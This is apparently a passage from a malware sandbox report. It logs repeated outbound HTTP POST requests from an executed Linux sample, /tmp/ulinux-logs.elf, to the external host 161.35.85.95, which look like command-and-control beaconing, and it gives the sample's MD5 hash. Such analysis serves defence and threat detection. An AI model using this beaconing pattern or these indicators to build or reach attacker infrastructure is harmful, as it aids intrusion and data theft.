Date: Fri, 21 Mar 2025 12:02:04 GMT
Pragma: no-cache
Server: NetDNA-cache/2.2
Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          3 | 192.168.2.23 | 52636 | 161.35.85.95 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Mar 21, 2025 13:02:18.718152046 CET | 413 | OUT | POST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Mar 21, 2025 13:02:19.242772102 CET | 413 | OUT | POST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Mar 21, 2025 13:02:19.754861116 CET | 413 | OUT | POST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Mar 21, 2025 13:02:20.778734922 CET | 413 | OUT | POST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Mar 21, 2025 13:02:20.930393934 CET | 457 | IN | HTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 176
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:18 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          4 | 192.168.2.23 | 52638 | 161.35.85.95 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Mar 21, 2025 13:02:36.113820076 CET | 413 | OUT | POST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Mar 21, 2025 13:02:36.289272070 CET | 457 | IN | HTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 176
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:36 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close


                                                          System Behavior

                                                          Start time (UTC): 12:02:00
                                                          Start date (UTC): 21/03/2025
                                                          Path: /tmp/ulinux-logs.elf
                                                          Arguments: /tmp/ulinux-logs.elf
                                                          File size: 8158184 bytes
                                                          MD5 hash: 915d49a0a95eb7903709d871bb9a3dbe